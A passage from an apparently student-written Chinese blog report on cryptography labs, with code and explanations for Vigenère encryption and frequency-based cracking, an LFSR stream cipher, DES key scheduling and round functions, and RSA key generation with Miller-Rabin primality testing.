class="number">26</span>];</span><br><span class="line"> }</span><br><span class="line"> temp[g]=<span class="built_in">abs</span>(x/L<span class="number">-0.065</span>);</span><br><span class="line">}</span><br><span class="line"><span class="keyword">float</span> value=temp[<span class="number">0</span>]; </span><br><span class="line"><span class="keyword">int</span> result=<span class="number">0</span>;</span><br><span class="line"><span class="keyword">for</span>(g=<span class="number">0</span>;g<<span class="number">26</span>;g++)<span class="comment">// 找最小偏差 </span></span><br><span class="line">{</span><br><span class="line"><span class="keyword">if</span>(temp[g]<value)</span><br><span class="line">{</span><br><span class="line">value=temp[g];</span><br><span class="line">result=g;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">key[i]=result;</span><br><span class="line">}</span><br><span class="line"><span class="built_in">cout</span><<<span class="string">"加密密钥为:"</span>;</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<klen;i++)</span><br><span class="line">{</span><br><span class="line">s2[i]=<span class="keyword">char</span>(<span class="string">'a'</span>+key[i]);</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><h3 id="运行结果-1"><a href="#运行结果-1" class="headerlink" title="运行结果"></a>运行结果</h3><h4 id="加密-1"><a href="#加密-1" class="headerlink" title="加密"></a>加密</h4><blockquote><p>例如明文是 Haha CUMTer~ ,密钥是 password,得到密文 Wazs YIDWtr~ 。</p></blockquote><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/V5B1GtPknLvWmCg.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h4 id="解密"><a href="#解密" class="headerlink" title="解密"></a>解密</h4><blockquote><p>例如密文是 Wazs YIDWtr~ ,密钥是 password,得到明文 Haha CUMTer~。</p></blockquote><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/7FhAy8vOo9nCJcX.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h4 id="破解"><a href="#破解" class="headerlink" title="破解"></a>破解</h4><blockquote><p>例如解密:</p><p><strong><em>BZGTNPMMCGZFPUWJCUIGRWXPFNLHZCKOAPGLKYJNRAQFIUYRAVGNPANUMDQOAHMWTGJDXGOMPJPTKAAVZIUIWKVTUCWBWNFWDFUMPJWPMQGPTNWXTSDPLPMWJAXUHHXWPFXXGVAPFNTXVFKOYIRBOQJHCBVWVFYCGQFGUSUBDWVIYATJGTBNDKGHCTMTWIUEFJITVUGJHHIMUVJICUWYQWYGGUWPUUCWIFGWUANILKPHDKOSPJTTWJQOJHXLBJAPZHVQWPDYPGLLGDBCHTGIZCCMEGVIIJLIFFBHSMEGUJHRXBOQUBDNASPEUCWNGWSNWXTSDPLPMWJAIUHUMWPSYCTUWFBMIAMKVBNTDMQNBVDKILQSSDYVWVXIGDQFIBHSLEAVDBXGOLGDBCHTGIZVNFQFKTNGRWXUDCTGKWCOXIXKZPPFDZG\</em></strong></p><p>结果是:</p><p><strong><em>THESTATEKEYLABORATORYOFNETWORKINGANDSWITCHINGTECHNOLOGYBELONGSTOBEIJINGUNIVERSITYOFPOSTSANDTELECOMMUNICATIONSTHELABORATORYWASOPENEDINNINETEENNINETYTWOINNINETEENNINETYFIVETHELABORATORYPASSEDACCEPTANCEINSPECTIONBOGOVERNMENTANDANEVALUATIONORGANIZEDBYMINISTRYOFSCIENCEANDTECHNOLOGYINTWOTHOUSANDANDTWOSINCETWOTHOUSANDANDFOURTHELABORATORYHASBEENRENAMEDASTHESTATEKEYLABORATORYOFNETWORKINGANDSWITCHINGTECHNOLOGYBYMINISTRYOFSCIENCEANDTECHNOLOGY\</em></strong></p></blockquote><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/EcsJzqWKLCfHoOR.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h3 id="安全性分析-1"><a href="#安全性分析-1" class="headerlink" title="安全性分析"></a>安全性分析</h3><p>多表代换密码打破了原语言的字符出现规律,故其分析方法比单表代换密码复杂得多。多表代换密码对比单表代换密码安全性显著提高。但是仍然可以用一些统计分析法破解(具体参看上文攻击方法), 对所有多表密码的破译都是以字母频率为基础的,这里对维吉尼亚的分析仍不例外,只是直接的频率分析并不适用。通过卡西斯基试验或者就可以得到密钥长度,得到密钥长度,密钥就可以看作是多个凯撒密码结合到一起,每一个都可单独破解,就像上面的破解步骤。但是前提是密文足够长。所以,较短的密文几乎是不可破译的。较长的密文是很容易破解的。</p><h2 id="序列密码-LFSR"><a href="#序列密码-LFSR" class="headerlink" title="序列密码 LFSR"></a>序列密码 LFSR</h2><h3 id="概述-2"><a href="#概述-2" class="headerlink" title="概述"></a>概述</h3><p>反馈移位寄存器由移位寄存器和反馈函数组成。移位寄存器是由位组成的序列,每次移位寄存器中所有位右移一位,新的最左端的位根据寄存器中的某些位计算来得到,反馈函数用来计算新的最左端位。而线性移位寄存器就是采用线性函数来作为反馈函数的反馈移位寄存器。</p><h3 id="算法实现-2"><a href="#算法实现-2" class="headerlink" title="算法实现"></a>算法实现</h3><p>开始设置好寄存器初始序列全局变量,抽头序列,再初始化一个跟寄存器长度一样的新列表。</p><p>利用zfill函数来初始化寄存器状态,定义 output_ = [] 来存放输出序列,编写feedback函数计算抽头异或的值,reg.txt记录周期内寄存器的状态。</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># 20次本原多项式:x^20 + x^3 + 1</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">feedbck</span><span class="params">(reg, fb)</span>:</span></span><br><span class="line"> <span class="string">"""</span></span><br><span class="line"><span class="string"> 反馈函数</span></span><br><span class="line"><span class="string"> :param reg: 移位寄存器的内容</span></span><br><span class="line"><span class="string"> :param fb: 由抽头构成的列表</span></span><br><span class="line"><span class="string"> :return: 最左端的输入</span></span><br><span class="line"><span class="string"> """</span></span><br><span class="line"> res = reg[fb[<span class="number">0</span>] - <span class="number">1</span>]</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>, len(fb)):</span><br><span class="line"> res = int(res) ^ int(reg[fb[i] - <span class="number">1</span>])</span><br><span class="line"> <span class="keyword">return</span> res</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">lfsr</span><span class="params">(p)</span>:</span></span><br><span class="line"> <span class="string">"""</span></span><br><span class="line"><span class="string"> 线性反馈移位寄存器</span></span><br><span class="line"><span class="string"> :param p: 由本原多项式次数构成的列表</span></span><br><span class="line"><span class="string"> :return:</span></span><br><span class="line"><span class="string"> """</span></span><br><span class="line"> reg_len = max(p)</span><br><span class="line"> <span class="comment"># 初始寄存器状态:00000....001</span></span><br><span class="line"> shift_reg = <span class="string">'1'</span>.zfill(reg_len) <span class="comment">#在1前面补0</span></span><br><span class="line"> regs = [shift_reg] <span class="comment"># 存放寄存器的各个状态</span></span><br><span class="line"> output_ = [] <span class="comment"># 存放输出序列</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(pow(<span class="number">2</span>, reg_len) - <span class="number">1</span>):</span><br><span class="line"> <span class="comment"># 输出寄存器最右端的值</span></span><br><span class="line"> output_.append(shift_reg[<span class="number">-1</span>])</span><br><span class="line"> <span class="comment"># 计算抽头异或的值</span></span><br><span class="line"> input_ = str(feedback(shift_reg, p))</span><br><span class="line"> shift_reg = input_ + shift_reg[:<span class="number">-1</span>]</span><br><span class="line"> <span class="comment"># 如果寄存器当前状态已经出现过了,说明一个周期结束</span></span><br><span class="line"> <span class="keyword">if</span> shift_reg <span class="keyword">in</span> regs:</span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> regs.append(shift_reg)</span><br><span class="line"> <span class="keyword">return</span> output_, regs</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span><span class="params">()</span>:</span></span><br><span class="line"> <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> ct = input(<span class="string">"\n请输入本原多项式x的系数(以空格分隔):\n"</span>).split(<span class="string">" "</span>)</span><br><span class="line"> <span class="keyword">if</span> (<span class="string">'q'</span> <span class="keyword">in</span> ct) <span class="keyword">or</span> (<span class="string">'Q'</span> <span class="keyword">in</span> ct):</span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"> ct = [int(ct[i]) <span class="keyword">for</span> i <span class="keyword">in</span> range(len(ct))]</span><br><span class="line"> print(<span class="string">"您输入的本原多项式为:"</span>)</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(len(ct)):</span><br><span class="line"> print(<span class="string">"x^"</span> + str(ct[i]) + <span class="string">" + "</span>, end=<span class="string">""</span>)</span><br><span class="line"> print(<span class="string">"1"</span>)</span><br><span class="line"> print(<span class="string">"理论最大周期为: "</span> + str(pow(<span class="number">2</span>, max(ct)) - <span class="number">1</span>))</span><br><span class="line"> mode = input(<span class="string">"是否确认:\n[Y]确定\t[N]重新输入\t[Q]退出\n"</span>)</span><br><span class="line"> <span class="keyword">if</span> mode == <span class="string">'Y'</span> <span class="keyword">or</span> mode == <span class="string">'y'</span>:</span><br><span class="line"> outputs, regs = lfsr(ct)</span><br><span class="line"> print(<span class="string">"\n周期为: "</span> + str(len(outputs)))</span><br><span class="line"> choice1 = input(<span class="string">"是否查看输出序列:\n[Y]是\t[N]否\n"</span>)</span><br><span class="line"> <span class="keyword">if</span> choice1 == <span class="string">'Y'</span> <span class="keyword">or</span> choice1 == <span class="string">'y'</span>:</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> outputs:</span><br><span class="line"> print(i, end=<span class="string">""</span>)</span><br><span class="line"> choice2 = input(<span class="string">"\n是否输出周期内寄存器各状态:\n[Y]是\t[N]否\n"</span>)</span><br><span class="line"> <span class="keyword">if</span> choice2 == <span class="string">'Y'</span> <span class="keyword">or</span> choice2 == <span class="string">'y'</span>:</span><br><span class="line"> <span class="keyword">with</span> open(<span class="string">'regs.txt'</span>, <span class="string">'w'</span>) <span class="keyword">as</span> f:</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> regs:</span><br><span class="line"> f.write(i + <span class="string">"\n"</span>)</span><br><span class="line"> print(<span class="string">"成功!周期内寄存器各状态保存在regs.txt"</span>)</span><br><span class="line"> <span class="keyword">elif</span> mode == <span class="string">'N'</span> <span class="keyword">or</span> mode == <span class="string">'n'</span>:</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">if</span> mode == <span class="string">'Q'</span> <span class="keyword">or</span> mode == <span class="string">'q'</span>:</span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">except</span>:</span><br><span class="line"> print(<span class="string">"输入有误!"</span>)</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line"> main()</span><br></pre></td></tr></table></figure></div><h3 id="运行结果-2"><a href="#运行结果-2" class="headerlink" title="运行结果"></a>运行结果</h3><p>20次本原多项式:x^18 + x^3 + 1</p><p>寄存器初始值:[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1]</p><p>本原多项式:[1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0]</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/OaJ71VAvEzou3NU.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h3 id="安全性分析-2"><a href="#安全性分析-2" class="headerlink" title="安全性分析"></a>安全性分析</h3><p>由算法的实现可知,序列密码算法的加解密对种子秘钥的依赖十分强烈。故需要保证种子秘钥的安全性。对于此可进行相关攻击。可以进行穷举搜素攻击,故为了保证安全强度,要求秘钥长度足够长。弱密钥攻击,弱密钥会产生重复的密钥流,一旦子密钥序列出现了重复,密文就有可能被破解。序列密码具有实现简单、便于硬件实施、加解密处理速度快、没有或只有有限的错误传播等特点,因此在实际应用中,特别是专用或机密机构中保持着优势,序列密码是一个随时间变化的加密变换,具有转换速度快、低错误传播的优点,硬件实现电路更简单。</p><h2 id="分组密码"><a href="#分组密码" class="headerlink" title="分组密码"></a>分组密码</h2><h3 id="概述-3"><a href="#概述-3" class="headerlink" title="概述"></a>概述</h3><p>DES是分组加密,将明文分成64位一组,密钥长度 64 比特(其中有效长度为 56 比特),8 的倍数位为奇校验位(保证每 8 位有奇数个 1)。如图,64 比特的密钥经过置换选择和循环移位操作可生成 16 个 48 比特的子密钥。明文 m 经过初始置换 IP 后划分为左右两部分(各32 比特),经过 16 轮 Feistel 结果(其中最后一轮不做左右交换)再做一次逆置换 IP-1得到密文 c 。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/RwXo4zZ3BbAuvgd.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>加密方程:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/kLUrC6HYhunBxSf.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>解密方程:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/Z7IKfMSBF4RVUkH.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>由此可见DES是一个对合运算。</p><h3 id="密钥扩展"><a href="#密钥扩展" class="headerlink" title="密钥扩展"></a>密钥扩展</h3><p>用于生成迭代的子密钥。具体过程为:</p><p>64位初始密钥经过置换选择1 ( PC-1 ) 后变成 56 位,经过循环左移和置换选择2 ( PC-2 ) 后分别得到 16 个 48 位子密钥 Ki 用做每一轮的迭代运算。</p><p>PC-1 去掉了校验位, PC-2 去掉了9, 18, 22, 25, 35, 38, 43, 54 位。</p><h4 id="置换选择"><a href="#置换选择" class="headerlink" title="置换选择"></a>置换选择</h4><p>置换选择1(PC-1)和置换选择2(PC-2):</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#秘钥的PC-1置换</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">change_key1</span><span class="params">(my_key)</span>:</span></span><br><span class="line"> res = <span class="string">""</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> PC_1:</span><br><span class="line"> res += my_key[i<span class="number">-1</span>]</span><br><span class="line"> <span class="keyword">return</span> res</span><br><span class="line"></span><br><span class="line"><span class="comment">#秘钥的PC-2置换</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">change_key2</span><span class="params">(my_key)</span>:</span></span><br><span class="line"> res = <span class="string">""</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> PC_2:</span><br><span class="line"> res += my_key[i<span class="number">-1</span>]</span><br><span class="line"> <span class="keyword">return</span> res</span><br></pre></td></tr></table></figure></div><h4 id="循环左移"><a href="#循环左移" class="headerlink" title="循环左移"></a>循环左移</h4><p>输入序列经过指定循环左移次数后得到结果(可以使用切片法):</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#循环左移操作</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">left_turn</span><span class="params">(my_str,num)</span>:</span></span><br><span class="line"> left_res = my_str[num:len(my_str)]</span><br><span class="line"> left_res = my_str[<span class="number">0</span>:num]+left_res</span><br><span class="line"> <span class="keyword">return</span> left_res</span><br></pre></td></tr></table></figure></div><p>加入取模操作的好处:若 <code>num</code> 为负数,则相当于可以处理循环右移,方便解密时使用。</p><h3 id="初始置换-IP-和它的逆置换-IP-1"><a href="#初始置换-IP-和它的逆置换-IP-1" class="headerlink" title="初始置换 IP 和它的逆置换 IP-1"></a>初始置换 IP 和它的逆置换 IP-1</h3><p>IPIP 在第一轮迭代之前进行,目的是将原明文块的位进行换位操作(查表),实际并没有密码意义,因此在软件中时常直接被去掉。</p><p>IP−1IP−1 在最后一轮迭代之后进行,在加密算法中输出为密文,在解密算法中输出明文,若 IPIP 被去掉,IP−1IP−1 也相应地被去掉。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/FwSLDfHza7yYRsu.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">#IP盒处理</span><br><span class="line">def ip_change(bin_str):</span><br><span class="line"> res = ""</span><br><span class="line"> for i in IP_table:</span><br><span class="line"> res += bin_str[i-1] #数组下标i-1</span><br><span class="line"> return res</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">#IP逆盒处理</span><br><span class="line">def ip_re_change(bin_str):</span><br><span class="line"> res = ""</span><br><span class="line"> for i in IP_re_table:</span><br><span class="line"> res += bin_str[i-1]</span><br><span class="line"> return res</span><br></pre></td></tr></table></figure></div><h3 id="F-函数"><a href="#F-函数" class="headerlink" title="F 函数"></a>F 函数</h3><p>也称轮函数,包括四个过程:</p><ol><li>扩展置换 ( E 盒 )</li><li>密钥加</li><li>S 盒</li><li>P 盒</li></ol><p>下面,我们分别解释这几个过程。</p><h4 id="1-扩展置换"><a href="#1-扩展置换" class="headerlink" title="1. 扩展置换"></a>1. 扩展置换</h4><p><strong><em>32 bit → 48 bit\</em></strong></p><p>通过扩展置换,数据的右半部分 从 32 位扩展到 48 位。扩展置换改变了位的次序,重复了某些位。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/6KLNZ7pdGP9vblH.png" alt="image-20210112205546510" title=""> </div> <div class="image-caption">image-20210112205546510</div> </figure><p>目的:让明文的 1 位可能影响到密文的 2 位,从而快速实现了雪崩效应。(结合 S 盒)</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#E盒置换</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">e_key</span><span class="params">(bin_str)</span>:</span></span><br><span class="line"> res = <span class="string">""</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> E:</span><br><span class="line"> res += bin_str[i<span class="number">-1</span>]</span><br><span class="line"> <span class="keyword">return</span> res</span><br></pre></td></tr></table></figure></div><h4 id="2-密钥加"><a href="#2-密钥加" class="headerlink" title="2. 密钥加"></a>2. 密钥加</h4><p><strong><em>48 bit ⊕ 48 bit → 48 bit\</em></strong></p><p>E 盒输出与子密钥 <strong><em>Xor\</em></strong> (逐位异或)。</p><p>Python 中,异或使用 <code>^</code> 运算符。因为我的处理方法是把字符转成对应的二进制(简单粗暴),所以我写了个封装 <strong><em>Xor\</em></strong> 的函数:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#字符串异或操作</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">str_xor</span><span class="params">(my_str1,my_str2)</span>:</span></span><br><span class="line"> res = <span class="string">""</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,len(my_str1)):</span><br><span class="line"> xor_res = int(my_str1[i],<span class="number">10</span>)^int(my_str2[i],<span class="number">10</span>) <span class="comment">#变成10进制是转化成字符串 2进制与10进制异或结果一样,都是1,0</span></span><br><span class="line"> <span class="keyword">if</span> xor_res == <span class="number">1</span>:</span><br><span class="line"> res += <span class="string">'1'</span></span><br><span class="line"> <span class="keyword">if</span> xor_res == <span class="number">0</span>:</span><br><span class="line"> res += <span class="string">'0'</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> res</span><br></pre></td></tr></table></figure></div><h4 id="3-代换盒(S-盒)"><a href="#3-代换盒(S-盒)" class="headerlink" title="3. 代换盒(S 盒)"></a>3. 代换盒(S 盒)</h4><p><strong><em>48 bit → 32 bit\</em></strong></p><p>目的是实现非线性代换,是 <strong>DES 中的唯一的非线性部分</strong>。</p><p>实际上是查表运算,8 个 S 盒对应把 48 位分成 8 个组(6 位一组)。</p><p>每个 S 盒的输入为 6 位,输出为 4 位。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/43JPsw2OmtHheCW.png" alt="image-20210112205534444" title=""> </div> <div class="image-caption">image-20210112205534444</div> </figure><p> 利用了bin输出有可能不是4位str类型的值,所以才有下面的循环并且加上字符0</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># S盒过程</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">s_box</span><span class="params">(my_str)</span>:</span></span><br><span class="line"> res = <span class="string">""</span></span><br><span class="line"> c = <span class="number">0</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,len(my_str),<span class="number">6</span>):</span><br><span class="line"> now_str = my_str[i:i+<span class="number">6</span>]</span><br><span class="line"> row = int(now_str[<span class="number">0</span>]+now_str[<span class="number">5</span>],<span class="number">2</span>)</span><br><span class="line"> col = int(now_str[<span class="number">1</span>:<span class="number">5</span>],<span class="number">2</span>)</span><br><span class="line"> num = bin(S[c][row*<span class="number">16</span> + col])[<span class="number">2</span>:] <span class="comment">#利用了bin输出有可能不是4位str类型的值,所以才有下面的循环并且加上字符0</span></span><br><span class="line"> <span class="keyword">for</span> gz <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">4</span>-len(num)):</span><br><span class="line"> num = <span class="string">'0'</span>+ num</span><br><span class="line"> res += num</span><br><span class="line"> c += <span class="number">1</span></span><br><span class="line"> <span class="keyword">return</span> res</span><br></pre></td></tr></table></figure></div><h4 id="4-置换盒(P-盒)"><a href="#4-置换盒(P-盒)" class="headerlink" title="4. 置换盒(P 盒)"></a>4. 置换盒(P 盒)</h4><p><strong><em>32 bit → 32 bit\</em></strong></p><p>简单置换。</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#P盒置换</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">p_box</span><span class="params">(bin_str)</span>:</span></span><br><span class="line"> res = <span class="string">""</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> P:</span><br><span class="line"> res += bin_str[i<span class="number">-1</span>]</span><br><span class="line"> <span class="keyword">return</span> res</span><br></pre></td></tr></table></figure></div><h3 id="运行结果-3"><a href="#运行结果-3" class="headerlink" title="运行结果"></a>运行结果</h3><h4 id="加密-2"><a href="#加密-2" class="headerlink" title="加密"></a>加密</h4><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/nbDWETfgRQNtH1w.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h4 id="解密-1"><a href="#解密-1" class="headerlink" title="解密"></a>解密</h4><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/3GUOFL1Smy7a8Qe.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h3 id="安全性分析-3"><a href="#安全性分析-3" class="headerlink" title="安全性分析"></a>安全性分析</h3><p>安全性争论:</p><ul><li>S盒的设计准则还没有完全公开,人们仍然不知道S盒的构造中是否使用了进一步的设计准则</li><li>DES存在一些弱密钥和半弱密钥</li><li>DES的56位密钥无法抵抗穷举攻击</li><li>代数结构存在互补对称性</li></ul><p>弱密钥:</p><p>给定初始密钥𝐾生成子密钥时,将种子密钥分成两个部分,如果𝐾使得这两部分的每一部分的所有位置全为0或1,则经子密钥产生器产生的各个子密钥都相同,即𝐾1=𝐾2=…=𝐾16,则称密钥𝐾为弱密钥(共有4个)</p><p>若𝐾为弱密钥,则对任意的64比特信息有:</p><p>Ek(Ek(m))=m和Dk(Dk(m))=mEk(Ek(m))=m和Dk(Dk(m))=m</p><p>半弱密钥:</p><p>把明文加密成相同的密文,即存在两个不同的密钥𝑘和𝑘′,使得𝐸<em>𝑘 (𝑚)=𝐸</em>(𝑘^′ ) (𝑚)</p><p>具有下述性质:</p><p>若𝑘和𝑘′为一对弱密钥,𝑚为明文组,则有:</p><p>Ek′(Ek(m))=Ek(Ek′(m))=mEk′(Ek(m))=Ek(Ek′(m))=m</p><p>互补性:</p><p>对明文𝑚逐位取补,记为𝑚 ̅,密钥𝐾逐位取补,记为𝑘 ̅ , 若𝑐=𝐸𝑘(𝑚),则有𝑐 ̅=𝐸_𝑘 ̅ (𝑚 ̅) ,称为算法上的互补性</p><p>由算法中两次异或运算的配置决定:两次异或运算一次在S盒之前,一次在P盒置换之后</p><p>若对DES 的明文和密钥同时取补,则扩展运算E的输出和子密钥产生器的输出也都取补,因而经异或运算后的输出和未取补时的输出一样,即到达S盒的输入数据未变,输出自然也不变,但经第二个异或运算时,由于左边数据已取补,因而输出也就取补</p><p>互补性使DES在选择明文攻击下所需的工作量减半(2^55)</p><p>对选择的明文𝑚和𝑚 ̅ 加密后得到密文如下:</p><p>c1=Ek(m)c2=Ek(m−)c1=Ek(m)c2=Ek(m−)</p><p>由对称互补性可得</p><p>c−2=Ek−(m)c2−=Ek−(m)</p><p>所以对𝑚加密,如果密文为𝑐_1,则加密密钥为𝑘, 如果密文为(𝑐_2 ) ̅,则加密密钥为𝑘 ̅</p><p>差分分析法:</p><p>通过分析特定明文差对结果密文差的影响来获得可能性最大的密钥。这种攻击方法主要适用于攻击迭代分组密码,最初是针对DES提出的一种攻击方法,虽然差分攻击方法对破译16轮的DES不能提供一种实用的方法,但对破译轮数较低的DES是很成功的。</p><p>线性分析法:</p><p>寻找一个给定密码算法的有关明文比特、密文比特和密钥比特的有效线性近似表达式,通过选择充分多的明-密文对来分析密钥的某些比特,用这种方法破译DES比差分分析方法更有效。可用247个已知明文破译8-轮DES。</p><p>三重DES:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/kFI1fZwbC3vTpen.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>两密钥的3DES称为加密-解密-加密方案,简记为EDE(encrypt-decrypt-encrypt)</p><p>破译它的穷举密钥搜索量为2112 量级,用差分分析破译也要超过1035sup>量级。此方案仍有足够的安全性。</p><h2 id="公钥密码RSA"><a href="#公钥密码RSA" class="headerlink" title="公钥密码RSA"></a>公钥密码RSA</h2><h3 id="RSA算法原理"><a href="#RSA算法原理" class="headerlink" title="RSA算法原理"></a>RSA算法原理</h3><ol><li>密钥的生成</li></ol><ul><li><p>选择两个大素数 𝑝和𝑞,(𝑝≠𝑞,需要保密,步骤4以后建议销毁)</p></li><li><p>计算𝑛=𝑝×𝑞, (𝑛)=(𝑝-1)×(𝑞-1)</p></li><li><p>选择整数 𝑒 使 ((𝑛),𝑒) =1, 1<𝑒< (𝑛)</p></li><li><p>计算𝑑,使𝑑=𝑒-1 𝑚𝑜𝑑 (𝑛),</p><p>得到:公钥为{𝑒, 𝑛}; 私钥为{𝑑}</p></li></ul><ol><li>加密(用𝒆,𝒏): 明文𝑀<𝑛, 密文𝐶=𝑀^𝑒 (𝑚𝑜𝑑 𝑛).</li><li>解密(用𝒅,𝒏): 密文𝐶, 明文𝑀 =𝐶^𝑑 (𝑚𝑜𝑑 𝑛)</li></ol><h3 id="大素数生成"><a href="#大素数生成" class="headerlink" title="大素数生成"></a>大素数生成</h3><p>对于大整数的素性测试,一般用 Miller-Rabin 算法。它是一个基于概率的算法,是费马小定理(若 n 是一个素数,则 an-1 ≡ 1 (mod n) )的一个改进。要测试 n 是否为素数,首先将 n−1 分解为 2sd 。在每次测试开始时,先随机选一个介于 [1,n−1] 的整数 a ,之后如果对所有的 r∈[0,s−1] ,若admodn≠1 且 a2rd mod n≠−1,则 n 是合数。否则,n 有 3/4 的概率为素数。增加测试的次数,该数是素数的概率会越来越高。这样,我们就可以给定位数 n 的情况下随机生成数,然后再用 Miller-Rabin 算法验证它是不是素数,若是,则就用它,否则再随机生成其他数字,循环。Python 脚本如下:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">miller_rabin</span><span class="params">(n, k=<span class="number">10</span>)</span>:</span></span><br><span class="line"> <span class="string">"""</span></span><br><span class="line"><span class="string"> 用Miler-Rabin算法进行素性检验</span></span><br><span class="line"><span class="string"> :param n: 被检验的数</span></span><br><span class="line"><span class="string"> :param k: 检验的次数,默认为15次</span></span><br><span class="line"><span class="string"> :return: 是否通过检验</span></span><br><span class="line"><span class="string"> 